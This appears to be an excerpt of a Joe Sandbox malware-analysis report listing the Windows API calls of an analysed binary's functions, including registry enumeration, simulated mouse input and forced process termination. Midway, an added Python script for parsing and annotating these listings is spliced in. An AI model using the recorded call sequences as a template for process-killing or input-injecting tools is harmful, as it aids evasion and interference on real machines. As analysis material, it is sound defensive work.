                                                      • _strlen.LIBCMT ref: 00876D44
                                                      • _memmove.LIBCMT ref: 00876DAD
                                                      Similarity
                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3619996494-0
                                                      • Opcode ID: 98efe3eb3324b212d05ff11c95735742fda146c1e94643582daf85a1394ac84f
                                                      • Instruction ID: bc9ff6d1aa271db1d4f24c2947f6320d9bc8ba8b9140a6676a405fbabf58a16f
                                                      • Opcode Fuzzy Hash: 98efe3eb3324b212d05ff11c95735742fda146c1e94643582daf85a1394ac84f
                                                      • Instruction Fuzzy Hash: 6481C571204600AFD750EB28DC82E6BBBA8FF84724F148518F999DB2D2EA71DD44CB52
                                                      APIs
                                                      Similarity
                                                      • API ID: _memmove$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 3253778849-0
                                                      • Opcode ID: 026c13e68b39466d2ae94973b14515d0b3be80e7c79bda7406d5a8bdf8ab8ebf
                                                      • Instruction ID: 94b2b0012fcab326926fce53fcb0137c8b1b010e8d54a8e75899e93b37ddd14b
                                                      • Opcode Fuzzy Hash: 026c13e68b39466d2ae94973b14515d0b3be80e7c79bda7406d5a8bdf8ab8ebf
                                                      • Instruction Fuzzy Hash: E1619F7050029A9BCF01EF68DC82AFE37A5FF15308F058525F859AB293EB34A855CB52
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 00880E1A: CharUpperBuffW.USER32(?,?), ref: 00880E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008802BD
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008802FD
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00880320
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00880349
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0088038C
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00880399
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                      • String ID:
                                                      • API String ID: 4046560759-0
                                                      • Opcode ID: 0af07e27ac05bdb5a76fe2a84f9be75646c7242c8cdce7827567320df941fec5
                                                      • Instruction ID: 212bb1e227fcbcdd03c1f2a110467639112b77de26045a6f356068f358bada15
                                                      • Opcode Fuzzy Hash: 0af07e27ac05bdb5a76fe2a84f9be75646c7242c8cdce7827567320df941fec5
                                                      • Instruction Fuzzy Hash: 69513731208204AFCB51EB68C885E6ABBE8FF85314F04491DF995C72A2DB31E949CF52
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 008857FB
                                                      • GetMenuItemCount.USER32(00000000), ref: 00885832
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0088585A
                                                      • GetMenuItemID.USER32(?,?), ref: 008858C9
                                                      • GetSubMenu.USER32(?,?), ref: 008858D7
                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00885928
                                                      Similarity
                                                      • API ID: Menu$Item$CountMessagePostString
                                                      • String ID:
                                                      • API String ID: 650687236-0
                                                      • Opcode ID: 496d308c26aa6e611158e7f342b5a175b34e5f46f06682bdb1151a73e69370a0
                                                      • Instruction ID: 65b4d194dcc33464f2196413aff7430832e1c61f3ed30909752f9c25bec5e5da
                                                      • Opcode Fuzzy Hash: 496d308c26aa6e611158e7f342b5a175b34e5f46f06682bdb1151a73e69370a0
                                                      • Instruction Fuzzy Hash: 19515C75A00615EFCF11EF68C8459AEBBB4FF48320F104066E951EB352DB34AE418B91
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0085EF06
                                                      • VariantClear.OLEAUT32(00000013), ref: 0085EF78
                                                      • VariantClear.OLEAUT32(00000000), ref: 0085EFD3
                                                      • _memmove.LIBCMT ref: 0085EFFD
                                                      • VariantClear.OLEAUT32(?), ref: 0085F04A
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0085F078
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                      • String ID:
                                                      • API String ID: 1101466143-0
                                                      • Opcode ID: 059022ca0c6a0ba9749c99d71125bb6f32f8e25eaa3d5638d64480b59a51dd44
                                                      • Instruction ID: 0bc2ebab6f0f7b1c0f833a27747e1099ae6cd9d172cb774d55cc941e51f6117c
                                                      • Opcode Fuzzy Hash: 059022ca0c6a0ba9749c99d71125bb6f32f8e25eaa3d5638d64480b59a51dd44
                                                      • Instruction Fuzzy Hash: 34515D75A00209DFCB14CF58C884AAAB7B8FF4C314B15856AEE59DB342E734E915CB90
                                                      APIs
                                                      • _memset.LIBCMT ref: 00862258
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008622A3
                                                      • IsMenu.USER32(00000000), ref: 008622C3
                                                      • CreatePopupMenu.USER32 ref: 008622F7
                                                      • GetMenuItemCount.USER32(000000FF), ref: 00862355
                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00862386
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                      • String ID:
                                                      • API String ID: 3311875123-0
                                                      • Opcode ID: fe69548f3f1326b37190c785f4b8f9d40073e3d982379026134b49132226bd89
                                                      • Instruction ID: 90c38ce3a5f1f3bc100eb1106d5137f9a82e1b666139aa4afeb6bf7c998bc2b5
                                                      • Opcode Fuzzy Hash: fe69548f3f1326b37190c785f4b8f9d40073e3d982379026134b49132226bd89
                                                      • Instruction Fuzzy Hash: 3F51BE70600A4ADBDF21CF68CA88BADBBF5FF05318F1141A9E811E73A1D7748944CB52
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • BeginPaint.USER32(?,?), ref: 0080179A
                                                      • GetWindowRect.USER32(?,?), ref: 008017FE
                                                      • ScreenToClient.USER32(?,?), ref: 0080181B
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0080182C
                                                      • EndPaint.USER32(?,?), ref: 00801876
                                                      Similarity
                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                      • String ID:
                                                      • API String ID: 1827037458-0
                                                      • Opcode ID: 189408e408c29c40a3baf197059af649e2ba2a8a37c874ccd9d2c1a70e9f5fa0
                                                      • Instruction ID: b1cfd3b51fec51467a5968471bfcf42e789d70fd9b259dd3f82f5db99520e13e
                                                      • Opcode Fuzzy Hash: 189408e408c29c40a3baf197059af649e2ba2a8a37c874ccd9d2c1a70e9f5fa0
                                                      • Instruction Fuzzy Hash: D8418D70100601AFDB10DF28CC88FA67BF8FB59764F044639FAA4C61A2D730A945DB62
                                                      APIs
                                                      • ShowWindow.USER32(008C57B0,00000000), ref: 0088B712
                                                      • EnableWindow.USER32(00000000,00000000), ref: 0088B736
                                                      • ShowWindow.USER32(008C57B0,00000000), ref: 0088B796
                                                      • ShowWindow.USER32(00000000,00000004), ref: 0088B7A8
                                                      • EnableWindow.USER32(00000000,00000001), ref: 0088B7CC
                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0088B7EF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: 1a4cf643dcbccf82e6d978f991ea5e788cb79434f1297075c830f5e7e468c595
                                                      • Instruction ID: 8d5ec4ccfd939dc66e151ae60b0a8ec345e415307e7bcc40a63959ac97133d56
                                                      • Opcode Fuzzy Hash: 1a4cf643dcbccf82e6d978f991ea5e788cb79434f1297075c830f5e7e468c595
                                                      • Instruction Fuzzy Hash: 87415134600241AFDB25EF28C499B957BE1FF89310F5881B9FA58CF6A3C731A856CB51
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 008770AC
                                                        • Part of subcall function 008739A0: GetWindowRect.USER32(?,?), ref: 008739B3
                                                      • GetDesktopWindow.USER32 ref: 008770D6
                                                      • GetWindowRect.USER32(00000000), ref: 008770DD
                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0087710F
                                                        • Part of subcall function 00865244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008652BC
                                                      • GetCursorPos.USER32(?), ref: 0087713B
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00877199
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                      • String ID:
                                                      • API String ID: 4137160315-0
                                                      • Opcode ID: 031839dae328c5b7d912e8c28abaca73f047512737f396cfe44fbb1b11a838e4
                                                      • Instruction ID: 8e78bbcd8ac83b335e3d76a1f10075960a948b8757a9663daef0a52b836b6f6e
                                                      • Opcode Fuzzy Hash: 031839dae328c5b7d912e8c28abaca73f047512737f396cfe44fbb1b11a838e4
                                                      • Instruction Fuzzy Hash: 6131B272609305ABD720DF18D849F9BB7A9FF89314F004919F589D7192DB70EA09CBA2
                                                      APIs
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                        • Part of subcall function 0081FC86: _wcscpy.LIBCMT ref: 0081FCA9
                                                      • _wcstok.LIBCMT ref: 0086EC94
                                                      • _wcscpy.LIBCMT ref: 0086ED23
                                                      • _memset.LIBCMT ref: 0086ED56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                      • String ID: X
                                                      • API String ID: 774024439-3081909835
                                                      • Opcode ID: 0709673eb5c89325b65d52df120ed16c45c0b7157940ecf87e1a25a8fd0d0fb1
                                                      • Instruction ID: fe4cab7fbc9b5daa5a23f585bf7a7e9efd347b948455c319cd1343d4eddbabb4
                                                      • Opcode Fuzzy Hash: 0709673eb5c89325b65d52df120ed16c45c0b7157940ecf87e1a25a8fd0d0fb1
                                                      • Instruction Fuzzy Hash: 63C139755083509FC764EF28D881A5AB7E4FF85324F01892DF999DB2A2DB30EC45CB92
                                                      APIs
                                                        • Part of subcall function 008580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008580C0
                                                        • Part of subcall function 008580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008580CA
                                                        • Part of subcall function 008580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008580D9
                                                        • Part of subcall function 008580A9: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008580E0
                                                        • Part of subcall function 008580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008580F6
                                                      • GetLengthSid.ADVAPI32(?,00000000,0085842F), ref: 008588CA
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008588D6
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 008588DD
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 008588F6
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0085842F), ref: 0085890A
                                                      • HeapFree.KERNEL32(00000000), ref: 00858911
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 169236558-0
                                                      • Opcode ID: 4afb6d35eb34933976bff40d27739793f9c45ae8d2d111cc04f1c1550b1399b5
                                                      • Instruction ID: 39be1fe8471b41b7dfc0960b99fd7edbd15a063c0e3d1ec9d2b1e5bc002a3a0a
                                                      • Opcode Fuzzy Hash: 4afb6d35eb34933976bff40d27739793f9c45ae8d2d111cc04f1c1550b1399b5
                                                      • Instruction Fuzzy Hash: EB11B135501609FFDB119FA8DC09BBEBB68FB44316F10402AE945E7211CB32AD18DB61
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0085B7B5
                                                      • GetDeviceCaps.GDI32(00000000,00000058,?,?,80004003), ref: 0085B7C6
                                                      • GetDeviceCaps.GDI32(00000000,0000005A,?,?,80004003), ref: 0085B7CD
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0085B7D5
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0085B7EC
                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0085B7FE
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: 25e0d0654c8430f5c0931097c97f3749d11e5a945623824da8340c3695c358c6
                                                      • Instruction ID: 6442b7d2a48d580212758c71da5f3923ff55a608d8c4d2dcd23e4162c665198b
                                                      • Opcode Fuzzy Hash: 25e0d0654c8430f5c0931097c97f3749d11e5a945623824da8340c3695c358c6
                                                      • Instruction Fuzzy Hash: 36017175A00209BBEF109BAA9C49A5ABFA8FB58311F004065FE04E7292D6309C10CF91
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00820193
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 0082019B
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008201A6
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008201B1
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 008201B9
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 008201C1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: c3d95861d519c56fcb0adcc9d505645c79b7a00abb8f7d0bb4ec79de27f4a350
                                                      • Instruction ID: b6771515a5d4a3c2d016f24d76b93469400217cc331522ccc2dc1ded1ebac143
                                                      • Opcode Fuzzy Hash: c3d95861d519c56fcb0adcc9d505645c79b7a00abb8f7d0bb4ec79de27f4a350
                                                      • Instruction Fuzzy Hash: 3C016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87942C7F5A864CBE5
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008653F9
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0086540F
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0086541E
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0086542D
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00865437
                                                      • CloseHandle.KERNEL32(00000000), ref: 0086543E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: 2fee82f626a32d78c0ffb538c3b0c2adda3926d2a9de32d4cfabfc97ac965d3b
                                                      • Instruction ID: 98fec5de8a4008cef508c3fc84d7510ac9d9d8653cdaf2f9ddf3a98a4ceb1470
                                                      • Opcode Fuzzy Hash: 2fee82f626a32d78c0ffb538c3b0c2adda3926d2a9de32d4cfabfc97ac965d3b
                                                      • Instruction Fuzzy Hash: A5F06D32240158BBE3215BA6DC0DEAB7A7CFFCAB11F000269FA04D1052EAA01A0187B5
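The API bullets in these function listings are the most useful raw data in the report, but the hexadecimal arguments hide what each call actually does (the window-kill function directly above is a good case: WM_CLOSE, a 500 ms SMTO_ABORTIFHUNG timeout and PROCESS_ALL_ACCESS are all there, just as 00000010, 000001F4 and 001F0FFF). The script below is an added example; it is not part of the Joe Sandbox report nor code from the analysed sample. It parses bullets in the three shapes the listings use (a call with arguments, a call without, and a "Part of subcall function" entry) and labels arguments using a small table of Windows SDK constants chosen for this example. The embedded sample listing is the APIs block of the window-kill function above, copied from the report.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# One "APIs" bullet from a Joe Sandbox function listing, in its three shapes:
#   • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0086542D
#   • GetForegroundWindow.USER32 ref: 008770AC
#     • Part of subcall function 008739A0: GetWindowRect.USER32(?,?), ref: 008739B3
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Symbolic names for fixed-value arguments, keyed by (API, argument index).
# Values are Windows SDK constants; which ones to decode is this example's
# own choice, not something the report provides.
ENUMS = {
    ("OpenProcess", 0): {0x1F0FFF: "PROCESS_ALL_ACCESS"},
    ("PostMessageW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 4): {0x2: "SMTO_ABORTIFHUNG"},
    ("GetTokenInformation", 1): {0x2: "TokenGroups"},
    ("GetDeviceCaps", 1): {0x58: "LOGPIXELSX", 0x5A: "LOGPIXELSY"},
    ("ShowWindow", 1): {0x0: "SW_HIDE", 0x4: "SW_SHOWNOACTIVATE"},
    ("MapVirtualKeyW", 0): {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
                            0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"},
}
# Bit-flag arguments are decoded bit by bit; millisecond timeouts read as decimal.
FLAGS = {("mouse_event", 0): {0x8000: "MOUSEEVENTF_ABSOLUTE", 0x0001: "MOUSEEVENTF_MOVE"}}
TIMEOUTS = {("SendMessageTimeoutW", 5), ("WaitForSingleObject", 1), ("Sleep", 0)}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                        # int per hex literal, None for '?'
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # callee address for nested entries
    notes: list = field(default_factory=list)


def annotate(call: ApiCall) -> list:
    """Human-readable notes for the arguments the tables know about."""
    notes = []
    for i, value in enumerate(call.args):
        if value is None:
            continue
        key = (call.api, i)
        if key in ENUMS and value in ENUMS[key]:
            notes.append(f"arg{i}={ENUMS[key][value]}")
        elif key in FLAGS:
            names = [name for bit, name in FLAGS[key].items() if value & bit]
            mask = 0
            for bit in FLAGS[key]:
                mask |= bit
            if value & ~mask:                       # bits with no known name
                names.append(hex(value & ~mask))
            notes.append(f"arg{i}=" + ("|".join(names) if names else "0"))
        elif key in TIMEOUTS:
            notes.append(f"arg{i}={value} ms")
    return notes


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one listing bullet; return None for any other line of the report."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = []
    if m.group("args"):
        for token in m.group("args").split(","):
            token = token.strip()
            args.append(None if token == "?" else int(token, 16))
    call = ApiCall(api=m.group("api"), module=m.group("mod"), args=args,
                   ref=int(m.group("ref"), 16),
                   subcall_of=int(m.group("sub"), 16) if m.group("sub") else None)
    call.notes = annotate(call)
    return call


def summarize(listing: str) -> list:
    """One annotated line per top-level call, in report order; sub-call
    entries are dropped so the function's own call sequence stands out."""
    out = []
    for line in listing.splitlines():
        call = parse_api_line(line)
        if call is None or call.subcall_of is not None:
            continue
        text = f"{call.ref:08X} {call.api}"
        if call.notes:
            text += "  [" + ", ".join(call.notes) + "]"
        out.append(text)
    return out


# Sample input: the APIs block of the window-kill function, copied from the
# report. Arguments beyond a function's declared parameter count (OpenProcess
# has three) are values the plugin read from the stack and carry no meaning.
WINKILL_LISTING = """\
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008653F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0086540F
• GetWindowThreadProcessId.USER32(?,?), ref: 0086541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0086542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00865437
• CloseHandle.KERNEL32(00000000), ref: 0086543E
"""
```

Run over the sample, `summarize` renders the six calls as: post WM_CLOSE, send WM_CLOSE again with a 500 ms timeout that aborts if the target hangs, resolve the owning process, open it with PROCESS_ALL_ACCESS and terminate it, then close the handle. The same tables label the other listings on this page (the MapVirtualKeyW block resolves to VK_LWIN, VK_SHIFT, VK_LSHIFT, VK_RSHIFT, VK_CONTROL and VK_MENU; the GetDeviceCaps pair to LOGPIXELSX and LOGPIXELSY; the GetTokenInformation sub-calls to TokenGroups). Extend the tables rather than guessing at a value: an argument the tables do not know is simply left unannotated.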
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?,?,?,?,00845D3D,?,?,?,?,00810EE4,?,?), ref: 00867243
                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 00867254
                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00810EE4,?,?), ref: 00867261
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0086726E
                                                        • Part of subcall function 00866C35: CloseHandle.KERNEL32(00000000), ref: 00866C3F
                                                      • InterlockedExchange.KERNEL32(?,000001F6,?,00810EE4,?,?), ref: 00867281
                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 00867288
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
